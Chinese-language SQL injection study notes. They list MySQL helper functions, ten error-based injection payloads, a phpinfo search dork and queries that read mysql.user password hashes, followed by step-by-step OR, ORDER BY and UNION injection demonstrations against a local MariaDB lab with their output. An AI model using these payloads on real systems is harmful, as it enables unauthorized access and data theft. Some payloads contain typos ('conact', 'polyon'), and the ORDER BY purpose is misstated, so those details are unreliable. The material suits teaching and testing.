SQL注入
SQL常用函数
- SQL常用函数
MID(要截取的字符串,起始位置,结束位置)截取字符串CHAR(ASCII)返回ASCII码对应的字符ASCII(字符)返回字符对应的ASCII码IF(逻辑表达式,返回值1,返回值2)用于判断SUBSTR(要截取的字符串,起始位置,结束位置)截取字符串LENGTH(字符串)返回字符串长度COUT(列名)返回当前列名下有效记录数SLEEP(s)静止s秒,数字类型,可自定义# /**/ --注释符CONCAT(字符串1,字符串2...)拼接字符串LOAD_FILE(文件名称)加载文件INTO OUTFILE '文件名称'输出
常用十大报错函数
-
floor()select * from test where id=1 and (select 1 from (select count(*), concat(user(), floor(rand(0)*2)) x from information_schema.tables group by x) a);
-
extractvalue()select * from test where id=1 and (extractvalue(1, conact(0x7e, (select user()),0x7e)));
-
updatexml()select * from test where id=1 and (updatexml(1, conact(0x7e, (select user()), 0x7e), 1));
-
geometrycollection()select * from test where id=1 and geometrycollection((select * from (select * from (select user()) a) b));
-
multipoint()select * from test where id=1 and multipoint((select * from (select * from (select user()) a) b));
-
polygon()select * from test where id=1 and polyon((select * from (select * from (select user()) a) b));
-
multipolygon()select * from test where id=1 and multipolygon((select * from (select * from (select user()) a) b));
-
linestring()select * from test where id=1 and linestring((select * from (select * from (select user()) a) b));
-
multilinestring()select * from test where id=1 and multilinestring((select * from (select * from (select user()) a) b));
-
exp()select * from test where id=1 and exp(~(select * from (select user()) a));
MySQL常用函数
-
查询版本
select version();
-
查询密码
select password from mysql.user;
-
查询所有数据
select * from mysql.user;
MySQL数据库配置文件
-
MySQL用户权限
information_schema.USER_PRIVILEGESselect * from information_schema.USER_PRIVILEGES;
-
MySQL数据库及表的情况
information_schema.TABLESselect * from information_schema.TABLES;
-
MySQL数据库及表的情况(包含字段)
information_schema.COLUMNSselect * from information_schema.COLUMNS
SQL注入测试
-
浏览器中输入
inurl:/phpinfo.php
-
SQL注入是如何产生的
- 这些攻击发生在当不可信的数据作为命令或者查询语句的一部分,被发送给解释器的时候
- 攻击者发送的恶意数据可以欺骗解释器
- 以执行计划外的命令或者在未被恰当授权时访问数据
or语句 SQL注入
- 功能
- 获取整张表额数据
# 正常查询操作
MariaDB [sel]> select * from grades where name='Sunny';
+-------+------+---------+------+
| name | sex | chinese | math |
+-------+------+---------+------+
| Sunny | boy | 93 | 96 |
+-------+------+---------+------+
# `1 row in set (0.000 sec)`
# SQL注入操作
MariaDB [sel]> select * from grades where name='Sunny' or 1=1;
+-------+------+---------+------+
| name | sex | chinese | math |
+-------+------+---------+------+
| Sunny | boy | 93 | 96 |
| Jerry | boy | 97 | 91 |
| Marry | girl | 95 | 94 |
| Tommy | boy | 98 | 94 |
+-------+------+---------+------+
# `4 rows in set (0.001 sec)`
MariaDB [sel]> select * from news where id=0 or 1=1;
+----+----------+--------------------------+------------+
| id | title | content | createtime |
+----+----------+--------------------------+------------+
| 1 | 基本知识 | 第1章 什么是Javascript | 1607050534 |
| 2 | 基本知识 | 第2章 HTML中的Javascript | 1607050590 |
| 3 | 基本知识 | 第3章 语言基础 | 1607052573 |
| 4 | 基本知识 | 第4章 变量、作用域和内存 | 1607070553 |
+----+----------+--------------------------+------------+
# `4 rows in set (0.001 sec)`
order by语句 SQL注入
- 功能
- 推断表的记录的总量
MariaDB [sel]> select * from news where id=2 order by 5;
# `ERROR 1054 (42S22): Unknown column '5' in 'order clause'`
MariaDB [sel]> select * from news where id=2 order by 4;
+----+----------+--------------------------+------------+
| id | title | content | createtime |
+----+----------+--------------------------+------------+
| 2 | 基本知识 | 第2章 HTML中的Javascript | 1607050590 |
+----+----------+--------------------------+------------+
# `1 row in set (0.000 sec)`
union语句 SQL注入
- 功能
- 推断表的字段的总量
# 正常情况
MariaDB [sel]> select * from news where id=1;
+----+----------+------------------------+------------+
| id | title | content | createtime |
+----+----------+------------------------+------------+
| 1 | 基本知识 | 第1章 什么是Javascript | 1607050534 |
+----+----------+------------------------+------------+
# `1 row in set (0.000 sec)`
MariaDB [sel]> select * from news where id=1 union select 0,0,0;
# `ERROR 1222 (21000): The used SELECT statements have a different number of columns`
MariaDB [sel]> select * from news where id=1 union select 0,0,0,0;
+----+----------+------------------------+------------+
| id | title | content | createtime |
+----+----------+------------------------+------------+
| 1 | 基本知识 | 第1章 什么是Javascript | 1607050534 |
| 0 | 0 | 0 | 0 |
+----+----------+------------------------+------------+
# `2 rows in set (0.006 sec)`
MariaDB [sel]> select * from news where id=1 union select 0,0,0,0,0;
# `ERROR 1222 (21000): The used SELECT statements have a different number of columns`
- 功能
- 获取mysql数据
MariaDB [sel]> select * from news where id=1 union select 1,2,host,4 from mysql.user;
+----+----------+------------------------+------------+
| id | title | content | createtime |
+----+----------+------------------------+------------+
| 1 | 基本知识 | 第1章 什么是Javascript | 1607050534 |
| 1 | 2 | 127.0.0.1 | 4 |
| 1 | 2 | ::1 | 4 |
| 1 | 2 | localhost | 4 |
+----+----------+------------------------+------------+
# `4 rows in set (0.011 sec)`
- 功能
- 获取数据库中的所有的数据库名
MariaDB [sel]> select * from news where id=0 union select 1,2,3,table_schema from information_schema.TABLES;
+----+-------+---------+--------------------+
| id | title | content | createtime |
+----+-------+---------+--------------------+
| 1 | 2 | 3 | information_schema |
| 1 | 2 | 3 | mysql |
| 1 | 2 | 3 | performance_schema |
| 1 | 2 | 3 | phpmyadmin |
| 1 | 2 | 3 | sel |
| 1 | 2 | 3 | stu |
+----+-------+---------+--------------------+
# `6 rows in set (0.018 sec)`
- 功能
- 获取数据库中的所有的表名
MariaDB [sel]> select * from news where id=0 union select 1,2,3,table_name from information_schema.TABLES;
- 功能
- 获取某个数据库中的所有的表名
MariaDB [sel]> select * from news where id=0 union select 1,2,3,table_name from information_schema.TABLES where table_schema='sel';
+----+-------+---------+------------+
| id | title | content | createtime |
+----+-------+---------+------------+
| 1 | 2 | 3 | bank |
| 1 | 2 | 3 | best |
| 1 | 2 | 3 | bestmath |
| 1 | 2 | 3 | grades |
| 1 | 2 | 3 | news |
| 1 | 2 | 3 | resume |
| 1 | 2 | 3 | stu1 |
| 1 | 2 | 3 | stu2 |
+----+-------+---------+------------+
# `8 rows in set (0.012 sec)`
- 功能
- 获取某张表中的所有的字段名
MariaDB [sel]> select * from news where id=0 union select 1,2,3,column_name from information_schema.COLUMNS where table_name='news';
+----+-------+---------+------------+
| id | title | content | createtime |
+----+-------+---------+------------+
| 1 | 2 | 3 | id |
| 1 | 2 | 3 | title |
| 1 | 2 | 3 | content |
| 1 | 2 | 3 | createtime |
+----+-------+---------+------------+
# `4 rows in set (0.016 sec)`
- 功能
- 获取字段内容
MariaDB [sel]> select * from news where id=1 union select 1,2,3,title from sel.news;
+----+----------+------------------------+------------+
| id | title | content | createtime |
+----+----------+------------------------+------------+
| 1 | 基本知识 | 第1章 什么是Javascript | 1607050534 |
| 1 | 2 | 3 | 基本知识 |
+----+----------+------------------------+------------+
# `2 rows in set (0.011 sec)`